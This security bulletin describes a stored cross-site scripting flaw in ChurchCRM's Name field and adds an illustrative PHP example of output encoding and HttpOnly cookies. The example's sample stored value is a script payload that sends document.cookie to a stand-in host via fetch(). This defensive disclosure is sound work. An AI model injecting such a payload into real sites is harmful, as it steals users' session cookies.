SB2026040991 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in ChurchCRM

Published: April 9, 2026

Security Bulletin ID: SB2026040991
Severity: Low
Patch available: YES
Number of vulnerabilities: 1
Exploitation vector: Remote access
Highest impact: Data manipulation

Breakdown by Severity

Low: 100% (Medium, High and Critical: 0%)

Description

This security bulletin contains information about 1 security vulnerability.


1) Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CVE-ID: CVE-2025-68401)

The vulnerability allows a remote user to execute arbitrary script in victims' browsers and disclose sensitive information.

The vulnerability exists due to cross-site scripting in the Name parameter when rendering stored user-supplied content. A remote privileged user can submit crafted HTML or JavaScript that is later viewed by other users to execute arbitrary script in victims' browsers and disclose sensitive information.

Where session cookies are not marked HttpOnly, the injected script can read document.cookie. Viewing the malicious content is required for exploitation, and privileged users such as admins or moderators may be affected.
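The two controls the description implies, shown as an added example that is not ChurchCRM's own code: HTML-encoding a stored Name value at output time, and marking the session cookie HttpOnly so that script which does run cannot read it. The function names and the sample stored value are constructed for illustration.

```php
<?php
// Constructed sample of a stored Name value containing injected markup,
// as a remote privileged user could submit it through the application.
$storedName = '<script>fetch("https://example.invalid/?c=" + document.cookie)</script>';

// Vulnerable pattern: the stored value is interpolated straight into HTML,
// so the browser of every user who views the page parses the injected tag.
function renderNameVulnerable(string $name): string
{
    return "<td>$name</td>";
}

// Hardened pattern: encode at the point of output. ENT_QUOTES also encodes
// single and double quotes, so the same helper is safe inside quoted
// attribute values; the charset is declared explicitly rather than assumed.
function renderNameSafe(string $name): string
{
    return '<td>' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Defence in depth for the cookie caveat above: an HttpOnly session cookie is
// not exposed through document.cookie even if an injection succeeds.
// Secure and SameSite are set alongside it; they are assumptions, not part
// of the bulletin.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// Compare the two renderings: only the second one reaches the browser as text.
echo renderNameVulnerable($storedName), PHP_EOL;
echo renderNameSafe($storedName), PHP_EOL;
```

The fix that matters is the output encoding; the cookie flag only limits what a successful injection can steal, and a stored payload can still act on the page itself.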


Remediation

Install the update from the vendor's website.